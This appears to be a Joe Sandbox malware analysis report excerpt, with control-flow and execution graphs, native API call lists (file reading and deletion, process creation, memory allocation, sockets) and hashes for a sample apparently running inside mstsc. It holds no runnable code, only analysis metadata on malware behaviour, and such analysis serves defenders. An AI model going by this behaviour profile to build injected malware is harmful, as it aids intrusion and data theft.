                                                control_flow_graph 0 637a29e-637a2a4 1 637a2a5-637a2b3 0->1 2 637a2b4 1->2 3 637a2dc-637a2e0 1->3 2->3 4 637a2b6-637a2da 2->4 5 637a336-637a339 3->5 6 637a2e2-637a2fd 3->6 4->1 7 637a33c-637a340 5->7 8 637a308-637a30e 6->8 7->7 9 637a342-637a34f socket 7->9 8->5 10 637a310-637a334 8->10 12 637a355-637a35c 9->12 13 637a3ec-637a3fa 9->13 10->8 15 637a367-637a36d 12->15 14 637a3fd-637a403 13->14 16 637a405-637a418 14->16 17 637a440-637a44c 14->17 18 637a395-637a399 15->18 19 637a36f-637a393 15->19 20 637a43a-637a43f 16->20 21 637a489-637a4a4 16->21 32 637a472-637a47a 17->32 33 637a44e 17->33 23 637a3db-637a3e9 call 637a0d5 18->23 24 637a39b-637a3a2 18->24 19->15 20->17 28 637a4a6-637a4a9 21->28 29 637a521-637a53b 21->29 23->13 26 637a3ad-637a3b3 24->26 26->23 35 637a3b5-637a3d1 26->35 30 637a504-637a506 28->30 31 637a4ac-637a4b6 28->31 34 637a4ce-637a4cf 29->34 39 637a4bf-637a4c9 30->39 40 637a508-637a510 30->40 37 637a46f-637a470 31->37 38 637a4b8-637a4be 31->38 32->20 43 637a47c-637a47d 32->43 41 637a3d4-637a3d9 33->41 42 637a450 33->42 34->30 35->41 37->32 38->39 39->34 40->29 41->26 42->14 44 637a452-637a461 42->44 43->21 44->37
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.3900775999.0000000006310000.00000040.80000000.00040000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_6310000_YKkstfciYBQ.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: socket
                                                • String ID:
                                                • API String ID: 98920635-0
                                                • Opcode ID: 8e00b282474e87777e8415908a8db3755ac6f0fa59af6aef1804e7b71b17e336
                                                • Instruction ID: dbe5bb072015e85717b49a7b8a4082c05db89d3bed79591384dcd06835aee78f
                                                • Opcode Fuzzy Hash: 8e00b282474e87777e8415908a8db3755ac6f0fa59af6aef1804e7b71b17e336
                                                • Instruction Fuzzy Hash: EB81FF31E08158DFDB25CF98D8906ADBBF2FF49314F188099E446AB351C7396946DB81

                                                Execution Graph

                                                Execution Coverage:3%
                                                Dynamic/Decrypted Code Coverage:4.1%
                                                Signature Coverage:0.6%
                                                Total number of Nodes:467
                                                Total number of Limit Nodes:76
                                                execution_graph 82857 4562ad0 LdrInitializeThunk 82858 489c00 82859 489d99 82858->82859 82860 48a448 82859->82860 82862 4aaec0 82859->82862 82863 4aaee3 82862->82863 82868 4841f0 82863->82868 82865 4aaeef 82867 4aaf28 82865->82867 82871 4a54a0 82865->82871 82867->82860 82875 493030 82868->82875 82870 4841fd 82870->82865 82872 4a5509 82871->82872 82874 4a5516 82872->82874 82899 491810 82872->82899 82874->82867 82876 49304a 82875->82876 82878 493060 82876->82878 82879 4a9c00 82876->82879 82878->82870 82881 4a9c1a 82879->82881 82880 4a9c49 82880->82878 82881->82880 82886 4a8850 82881->82886 82887 4a886d 82886->82887 82893 4562c0a 82887->82893 82888 4a8896 82890 4ab250 82888->82890 82896 4a9530 82890->82896 82892 4a9cbb 82892->82878 82894 4562c11 82893->82894 82895 4562c1f LdrInitializeThunk 82893->82895 82894->82888 82895->82888 82897 4a954a 82896->82897 82898 4a9558 RtlFreeHeap 82897->82898 82898->82892 82900 49184b 82899->82900 82915 497cf0 82900->82915 82902 491853 82903 491b36 82902->82903 82926 4ab330 82902->82926 82903->82874 82905 491869 82906 4ab330 RtlAllocateHeap 82905->82906 82907 49187a 82906->82907 82908 4ab330 RtlAllocateHeap 82907->82908 82909 49188b 82908->82909 82914 491922 82909->82914 82937 496850 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 82909->82937 82912 491ae2 82933 4a7de0 82912->82933 82929 494370 82914->82929 82916 497d1c 82915->82916 82938 497be0 82916->82938 82919 497d49 82924 497d54 82919->82924 82944 4a91d0 82919->82944 82920 497d61 82922 4a91d0 NtClose 82920->82922 82923 497d7d 82920->82923 82925 497d73 82922->82925 82923->82902 82924->82902 82925->82902 82952 4a94e0 82926->82952 82928 4ab34b 82928->82905 82930 494394 82929->82930 82931 4943d0 LdrLoadDll 82930->82931 82932 49439b 82930->82932 82931->82932 82932->82912 82934 4a7e42 82933->82934 82936 4a7e4f 82934->82936 82955 491b50 82934->82955 82936->82903 82937->82914 82939 497cd6 82938->82939 82940 497bfa 82938->82940 82939->82919 82939->82920 82947 4a88f0 82940->82947 82943 4a91d0 NtClose 82943->82939 82945 4a91ed 82944->82945 82946 4a91fb NtClose 82945->82946 82946->82924 82948 4a890a 82947->82948 82951 45635c0 LdrInitializeThunk 82948->82951 82949 497cca 82949->82943 82951->82949 82953 4a94fd 82952->82953 82954 4a950b RtlAllocateHeap 82953->82954 82954->82928 82958 491b70 82955->82958 82971 497fc0 82955->82971 82957 4920c0 82957->82936 82958->82957 82975 4a0fa0 82958->82975 82961 491d8e 82984 4ac540 82961->82984 82962 491bce 82962->82957 82979 4ac410 82962->82979 82965 491da3 82967 491df0 82965->82967 82990 490660 82965->82990 82967->82957 82968 490660 LdrInitializeThunk 82967->82968 82993 497f60 82967->82993 82968->82967 82969 491f43 82969->82967 82970 497f60 LdrInitializeThunk 82969->82970 82970->82969 82972 497fcd 82971->82972 82973 497fee SetErrorMode 82972->82973 82974 497ff5 82972->82974 82973->82974 82974->82958 82976 4a0fb9 82975->82976 82997 4ab1c0 82976->82997 82978 4a0fc1 82978->82962 82980 4ac420 82979->82980 82981 4ac426 82979->82981 82980->82961 82982 4ab330 RtlAllocateHeap 82981->82982 82983 4ac44c 82982->82983 82983->82961 82985 4ac4b0 82984->82985 82986 4ac50d 82985->82986 82987 4ab330 RtlAllocateHeap 82985->82987 82986->82965 82988 4ac4ea 82987->82988 82989 4ab250 RtlFreeHeap 82988->82989 82989->82986 83004 4a9450 82990->83004 82994 497f73 82993->82994 83009 4a8750 82994->83009 82996 497f9e 82996->82967 83000 4a9330 82997->83000 82999 4ab1f1 82999->82978 83001 4a93c2 83000->83001 83003 4a935b 83000->83003 83002 4a93d5 NtAllocateVirtualMemory 83001->83002 83002->82999 83003->82999 83005 4a946a 83004->83005 83008 4562c70 LdrInitializeThunk 83005->83008 83006 490682 83006->82969 83008->83006 83010 4a87ce 83009->83010 83011 4a877e 83009->83011 83014 4562dd0 LdrInitializeThunk 83010->83014 83011->82996 83012 4a87f0 83012->82996 83014->83012 83015 496bc0 83016 496bea 83015->83016 83019 497d90 83016->83019 83018 496c14 83020 497dad 83019->83020 83026 4a8940 83020->83026 83022 497dfd 83023 497e04 83022->83023 83031 4a8a20 83022->83031 83023->83018 83025 497e2d 83025->83018 83027 4a89d8 83026->83027 83029 4a896b 83026->83029 83036 4562f30 LdrInitializeThunk 83027->83036 83028 4a8a0e 83028->83022 83029->83022 83032 4a8a4e 83031->83032 83033 4a8acd 83031->83033 83032->83025 83037 4562d10 LdrInitializeThunk 83033->83037 83034 4a8b0f 83034->83025 83036->83028 83037->83034 83038 49abc0 83043 49a8d0 83038->83043 83040 49abcd 83057 49a540 83040->83057 83042 49abe9 83044 49a8f5 83043->83044 83068 4981d0 83044->83068 83047 49aa43 83047->83040 83049 49aa5a 83049->83040 83050 49aa51 83050->83049 83052 49ab47 83050->83052 83087 499f90 83050->83087 83054 49abaa 83052->83054 83096 49a300 83052->83096 83055 4ab250 RtlFreeHeap 83054->83055 83056 49abb1 83055->83056 83056->83040 83058 49a556 83057->83058 83061 49a561 83057->83061 83059 4ab330 RtlAllocateHeap 83058->83059 83059->83061 83060 49a588 83060->83042 83061->83060 83062 4981d0 GetFileAttributesW 83061->83062 83063 49a8a2 83061->83063 83066 499f90 RtlFreeHeap 83061->83066 83067 49a300 RtlFreeHeap 83061->83067 83062->83061 83064 49a8bb 83063->83064 83065 4ab250 RtlFreeHeap 83063->83065 83064->83042 83065->83064 83066->83061 83067->83061 83069 4981f1 83068->83069 83070 4981f8 GetFileAttributesW 83069->83070 83071 498203 83069->83071 83070->83071 83071->83047 83072 4a31f0 83071->83072 83073 4a31fe 83072->83073 83074 4a3205 83072->83074 83073->83050 83075 494370 LdrLoadDll 83074->83075 83076 4a323a 83075->83076 83077 4a3249 83076->83077 83100 4a2cc0 LdrLoadDll 83076->83100 83079 4ab330 RtlAllocateHeap 83077->83079 83083 4a33f7 83077->83083 83080 4a3262 83079->83080 83081 4a33ed 83080->83081 83080->83083 83085 4a327e 83080->83085 83082 4ab250 RtlFreeHeap 83081->83082 83081->83083 83082->83083 83083->83050 83084 4ab250 RtlFreeHeap 83086 4a33e1 83084->83086 83085->83083 83085->83084 83086->83050 83088 499fb6 83087->83088 83101 49d9c0 83088->83101 83090 49a028 83091 49a046 83090->83091 83093 49a1aa 83090->83093 83092 49a18f 83091->83092 83106 499e50 83091->83106 83092->83050 83093->83092 83094 499e50 RtlFreeHeap 83093->83094 83094->83093 83097 49a326 83096->83097 83098 49d9c0 RtlFreeHeap 83097->83098 83099 49a3ad 83098->83099 83099->83052 83100->83077 83103 49d9e4 83101->83103 83102 49d9f1 83102->83090 83103->83102 83104 4ab250 RtlFreeHeap 83103->83104 83105 49da34 83104->83105 83105->83090 83107 499e6d 83106->83107 83110 49da50 83107->83110 83109 499f73 83109->83091 83112 49da74 83110->83112 83111 49db1e 83111->83109 83112->83111 83113 4ab250 RtlFreeHeap 83112->83113 83113->83111 83114 4a8800 83115 4a881d 83114->83115 83118 4562df0 LdrInitializeThunk 83115->83118 83116 4a8842 83118->83116 83119 499a83 83121 499a8f 83119->83121 83120 499a96 83121->83120 83122 499acd 83121->83122 83123 4ab250 RtlFreeHeap 83121->83123 83123->83122 83124 4a8680 83125 4a870f 83124->83125 83127 4a86ae 83124->83127 83129 4562ee0 LdrInitializeThunk 83125->83129 83126 4a873d 83129->83126 83130 497182 83131 497137 83130->83131 83132 497187 83130->83132 83134 497151 83131->83134 83164 496550 NtClose LdrInitializeThunk LdrInitializeThunk 83131->83164 83136 497202 83132->83136 83137 49b0f0 83132->83137 83138 49b116 83137->83138 83139 49b349 83138->83139 83165 4a95b0 83138->83165 83139->83136 83141 49b192 83141->83139 83142 4ac540 2 API calls 83141->83142 83143 49b1b1 83142->83143 83143->83139 83144 49b285 83143->83144 83146 4a8850 LdrInitializeThunk 83143->83146 83145 49b2a1 83144->83145 83147 495960 LdrInitializeThunk 83144->83147 83152 49b331 83145->83152 83171 4a83c0 83145->83171 83148 49b213 83146->83148 83147->83145 83148->83144 83149 49b21c 83148->83149 83149->83139 83150 49b24b 83149->83150 83159 49b26d 83149->83159 83168 495960 83149->83168 83181 4a4620 LdrInitializeThunk 83150->83181 83151 497f60 LdrInitializeThunk 83157 49b27b 83151->83157 83156 497f60 LdrInitializeThunk 83152->83156 83160 49b33f 83156->83160 83157->83136 83158 49b308 83176 4a8470 83158->83176 83159->83151 83160->83136 83162 49b322 83182 4a85d0 83162->83182 83164->83134 83166 4a95ca 83165->83166 83167 4a95db CreateProcessInternalW 83166->83167 83167->83141 83169 49599e 83168->83169 83170 4a8a20 LdrInitializeThunk 83168->83170 83169->83150 83170->83169 83172 4a843a 83171->83172 83173 4a83eb 83171->83173 83187 45639b0 LdrInitializeThunk 83172->83187 83173->83158 83174 4a845c 83174->83158 83177 4a84ea 83176->83177 83179 4a849b 83176->83179 83188 4564340 LdrInitializeThunk 83177->83188 83178 4a850c 83178->83162 83179->83162 83181->83159 83183 4a85fe 83182->83183 83184 4a864d 83182->83184 83183->83152 83189 4562fb0 LdrInitializeThunk 83184->83189 83185 4a866f 83185->83152 83187->83174 83188->83178 83189->83185 83190 498687 83191 49868a 83190->83191 83192 498641 83191->83192 83194 496de0 LdrInitializeThunk LdrInitializeThunk 83191->83194 83194->83192 83195 48b390 83196 4ab1c0 NtAllocateVirtualMemory 83195->83196 83197 48ca01 83196->83197 83198 4920d0 83199 4a8850 LdrInitializeThunk 83198->83199 83200 492106 83199->83200 83203 4a9260 83200->83203 83202 49211b 83204 4a92ef 83203->83204 83206 4a928e 83203->83206 83208 4562e80 LdrInitializeThunk 83204->83208 83205 4a931d 83205->83202 83206->83202 83208->83205 83214 4a5f10 83215 4a5f6a 83214->83215 83217 4a5f77 83215->83217 83218 4a3920 83215->83218 83219 4ab1c0 NtAllocateVirtualMemory 83218->83219 83220 4a3961 83219->83220 83221 494370 LdrLoadDll 83220->83221 83224 4a3a6e 83220->83224 83222 4a39a7 83221->83222 83223 4a39f0 Sleep 83222->83223 83222->83224 83223->83222 83224->83217 83225 4a75d0 83227 4a7635 83225->83227 83226 4a766c 83227->83226 83230 49b360 83227->83230 83229 4a764e 83231 49b328 83230->83231 83232 49b380 83230->83232 83233 4a85d0 LdrInitializeThunk 83231->83233 83234 49b331 83233->83234 83235 497f60 LdrInitializeThunk 83234->83235 83236 49b33f 83235->83236 83236->83229 83237 4a15d0 83238 4a15ec 83237->83238 83239 4a1628 83238->83239 83240 4a1614 83238->83240 83241 4a91d0 NtClose 83239->83241 83242 4a91d0 NtClose 83240->83242 83243 4a1631 83241->83243 83244 4a161d 83242->83244 83247 4ab370 RtlAllocateHeap 83243->83247 83246 4a163c 83247->83246 83248 4a18e9 83249 4a18ef 83248->83249 83250 4a1912 83248->83250 83249->83250 83251 4a18f4 83249->83251 83252 4a91d0 NtClose 83250->83252 83256 4a5830 83251->83256 83253 4a1919 83252->83253 83255 4a1908 83257 4a5895 83256->83257 83258 4a58cc 83257->83258 83261 4a1010 83257->83261 83258->83255 83260 4a58ae 83260->83255 83262 4a0faa 83261->83262 83263 4a1032 83261->83263 83262->83261 83264 4ab1c0 NtAllocateVirtualMemory 83262->83264 83265 4a0fc1 83264->83265 83265->83260 83267 4925af 83270 4960f0 83267->83270 83269 4925cd 83271 496123 83270->83271 83272 496147 83271->83272 83277 4a8d50 83271->83277 83272->83269 83274 49616a 83274->83272 83275 4a91d0 NtClose 83274->83275 83276 4961ea 83275->83276 83276->83269 83278 4a8d6d 83277->83278 83281 4562ca0 LdrInitializeThunk 83278->83281 83279 4a8d96 83279->83274 83281->83279 83282 489ba0 83283 489baf 83282->83283 83284 489bf0 83283->83284 83285 489bdd CreateThread 83283->83285 83286 49c460 83288 49c489 83286->83288 83287 49c58d 83288->83287 83289 49c533 FindFirstFileW 83288->83289 83289->83287 83290 49c54e 83289->83290 83291 49c574 FindNextFileW 83290->83291 83291->83290 83292 49c586 FindClose 83291->83292 83292->83287 83293 49f6a0 83294 49f704 83293->83294 83295 4960f0 2 API calls 83294->83295 83297 49f837 83295->83297 83296 49f83e 83297->83296 83324 496200 83297->83324 83300 49f9e3 83302 49f8de 83303 49f9f2 83302->83303 83333 49f480 83302->83333 83305 4a91d0 NtClose 83303->83305 83306 49f9fc 83305->83306 83307 49f8f6 83307->83303 83308 49f901 83307->83308 83309 4ab330 RtlAllocateHeap 83308->83309 83310 49f92a 83309->83310 83311 49f949 83310->83311 83312 49f933 83310->83312 83342 49f370 CoInitialize 83311->83342 83313 4a91d0 NtClose 83312->83313 83315 49f93d 83313->83315 83316 49f957 83345 4a8cb0 83316->83345 83318 49f9d2 83319 4a91d0 NtClose 83318->83319 83320 49f9dc 83319->83320 83321 4ab250 RtlFreeHeap 83320->83321 83321->83300 83322 49f975 83322->83318 83323 4a8cb0 LdrInitializeThunk 83322->83323 83323->83322 83325 496225 83324->83325 83349 4a8b60 83325->83349 83328 4a6d40 83329 4a6da5 83328->83329 83330 4a6dd8 83329->83330 83354 4a0261 RtlFreeHeap 83329->83354 83330->83302 83332 4a6dba 83332->83302 83334 49f49c 83333->83334 83335 494370 LdrLoadDll 83334->83335 83337 49f4ba 83335->83337 83336 49f4c3 83336->83307 83337->83336 83338 494370 LdrLoadDll 83337->83338 83339 49f58e 83338->83339 83340 494370 LdrLoadDll 83339->83340 83341 49f5eb 83339->83341 83340->83341 83341->83307 83344 49f3d5 83342->83344 83343 49f46b CoUninitialize 83343->83316 83344->83343 83346 4a8cca 83345->83346 83355 4562ba0 LdrInitializeThunk 83346->83355 83347 4a8cf7 83347->83322 83350 4a8b7d 83349->83350 83353 4562c60 LdrInitializeThunk 83350->83353 83351 496299 83351->83300 83351->83328 83353->83351 83354->83332 83355->83347 83356 4959e0 83357 497f60 LdrInitializeThunk 83356->83357 83359 495a10 83356->83359 83357->83359 83360 495a3c 83359->83360 83361 497ee0 83359->83361 83362 497f24 83361->83362 83363 497f45 83362->83363 83368 4a8520 83362->83368 83363->83359 83365 497f35 83366 497f51 83365->83366 83367 4a91d0 NtClose 83365->83367 83366->83359 83367->83363 83369 4a859d 83368->83369 83370 4a854e 83368->83370 83373 4564650 LdrInitializeThunk 83369->83373 83370->83365 83371 4a85bf 83371->83365 83373->83371 83374 49ffa0 83375 49ffbd 83374->83375 83376 494370 LdrLoadDll 83375->83376 83377 49ffdb 83376->83377 83378 4a6d40 RtlFreeHeap 83377->83378 83379 4a0165 83377->83379 83378->83379 83380 4a8ee0 83381 4a8f94 83380->83381 83383 4a8f0f 83380->83383 83382 4a8fa7 NtCreateFile 83381->83382 83384 4a1960 83388 4a1979 83384->83388 83385 4a1a09 83386 4a19c4 83387 4ab250 RtlFreeHeap 83386->83387 83389 4a19d4 83387->83389 83388->83385 83388->83386 83390 4a1a04 83388->83390 83391 4ab250 RtlFreeHeap 83390->83391 83391->83385 83402 4a1161 83403 4a1173 83402->83403 83415 4a9040 83403->83415 83405 4a1182 83406 4a11a0 83405->83406 83407 4a11b5 83405->83407 83408 4a91d0 NtClose 83406->83408 83409 4a91d0 NtClose 83407->83409 83410 4a11a9 83408->83410 83412 4a11be 83409->83412 83411 4a11f5 83412->83411 83413 4ab250 RtlFreeHeap 83412->83413 83414 4a11e9 83413->83414 83416 4a90e7 83415->83416 83418 4a906e 83415->83418 83417 4a90fa NtReadFile 83416->83417 83417->83405 83418->83405 83419 490c3b PostThreadMessageW 83420 490c4d 83419->83420 83423 4ac470 83424 4ab250 RtlFreeHeap 83423->83424 83425 4ac485 83424->83425 83426 492f33 83427 497be0 2 API calls 83426->83427 83428 492f43 83427->83428 83429 4a91d0 NtClose 83428->83429 83430 492f5f 83428->83430 83429->83430 83431 4a9130 83432 4a91a4 83431->83432 83434 4a915b 83431->83434 83433 4a91b7 NtDeleteFile 83432->83433

                                                Executed Functions

                                                Function 004A9040 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(?,?,?,8425A42C,?,?,?,?,?), ref: 004A9123
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1b30a5894ca7decfd1ec0b50a2722d15ce6ee68af29a5c01f2d1c3e30651ca3e
                                                • Instruction ID: eb69f1ee77f6f149eff107fe83265ff0d715779d336d2560776437a2782a9659
                                                • Opcode Fuzzy Hash: 1b30a5894ca7decfd1ec0b50a2722d15ce6ee68af29a5c01f2d1c3e30651ca3e
                                                • Instruction Fuzzy Hash: 233128B1A00249AFDB14DF99D881EEFB7B8EF88304F10810AFD08A7341D774A951CBA5
                                                Function 004A9130 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 25b9e544fa80fa239ee8052d1846f08b4fea363545e3e76fb2be1572a679b93d
                                                • Instruction ID: 8b8fcde50d62a63b8e95bbcd777429cb32387945541afdd0efc5658fe2dda6c0
                                                • Opcode Fuzzy Hash: 25b9e544fa80fa239ee8052d1846f08b4fea363545e3e76fb2be1572a679b93d
                                                • Instruction Fuzzy Hash: 62119E716402446ED620EBA9CC42FAF77ACDF86718F00410AFA04AB281EB78795587E9
                                                Function 004A91D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 004A9204
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: eaaa498df1f202e73e11c77da93f6351c23fd3607e2548be4d2d18bd310d77a3
                                                • Instruction ID: 392d138b76139f45d0bece440768ae6b2be83f28bbefca0ecaae84b18cd2a83e
                                                • Opcode Fuzzy Hash: eaaa498df1f202e73e11c77da93f6351c23fd3607e2548be4d2d18bd310d77a3
                                                • Instruction Fuzzy Hash: 85E046366002147BC620EA5ADC01E9F776CDBC6B64F00841AFA09AB242D671B91187F8
                                                Function 045635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2a0d410adcb406a296ccd1493362cfbf26e39276cc78a31916c31c46b3766ab0
                                                • Instruction ID: ddfaf5d1d59a98bea485d8cd0c67062fa3829cbf76a14ab9ce83f76ee9402ac3
                                                • Opcode Fuzzy Hash: 2a0d410adcb406a296ccd1493362cfbf26e39276cc78a31916c31c46b3766ab0
                                                • Instruction Fuzzy Hash: C990023160550403F1007158551870620459BD0215F69C431A0425568D8795DA5175A2
                                                Function 04564650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8575229566520007df1afb1028ceaed08709901afd15e0d1e8e986dccfc5ed09
                                                • Instruction ID: 9599c2a0ab6a85e89c5b5692e727b095284663d6fa00e3b8c8dad5d51eef763a
                                                • Opcode Fuzzy Hash: 8575229566520007df1afb1028ceaed08709901afd15e0d1e8e986dccfc5ed09
                                                • Instruction Fuzzy Hash: 9F900261601500436140715858084067045ABE1315399C135A0555560C8618D955A269
                                                Function 04564340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1d4583b77ccd23086a2e4737c854938567f17ec0cc596ae08ebf28e34a3ac038
                                                • Instruction ID: 81510fab2e949f98491526d64c00813c6b6abbdad1d2cdd1b4bac12ab9b24b4e
                                                • Opcode Fuzzy Hash: 1d4583b77ccd23086a2e4737c854938567f17ec0cc596ae08ebf28e34a3ac038
                                                • Instruction Fuzzy Hash: 9590023160580013B140715858885465045ABE0315B59C031E0425554C8A14DA566361
                                                Function 04562C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b5766750caea770d47f54f3354097a1905d73c0762c21f8ab5efda151c056c6a
                                                • Instruction ID: 3aebcc3268bf03d8dc1ea83923fe353b7d8e9493994361c40fd30458617ba0e6
                                                • Opcode Fuzzy Hash: b5766750caea770d47f54f3354097a1905d73c0762c21f8ab5efda151c056c6a
                                                • Instruction Fuzzy Hash: 7390023120148803F1107158940874A10459BD0315F5DC431A4425658D8695D9917121
                                                Function 04562C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7e5e433df6d5a9ac1e10947a9cea021ceac3e7bf4aa8f84f7bc876d4d5588c7a
                                                • Instruction ID: b37747ef8295d8593ddbce10c8c2a42d96818a5a47524dbb732ebd7880f80172
                                                • Opcode Fuzzy Hash: 7e5e433df6d5a9ac1e10947a9cea021ceac3e7bf4aa8f84f7bc876d4d5588c7a
                                                • Instruction Fuzzy Hash: 6790023120140843F10071585408B4610459BE0315F59C036A0125654D8615D9517521
                                                Function 04562CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 77b46203e981011018b40a47edeb397a7f29ba8a6ad03cdc510f6d4b3382c674
                                                • Instruction ID: 36b9de2948e03100b35f0890adb11add5e06da49615dace01c63f63527f1c797
                                                • Opcode Fuzzy Hash: 77b46203e981011018b40a47edeb397a7f29ba8a6ad03cdc510f6d4b3382c674
                                                • Instruction Fuzzy Hash: 5590023120140403F1007598640C64610459BE0315F59D031A5025555EC665D9917131
                                                Function 04562D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
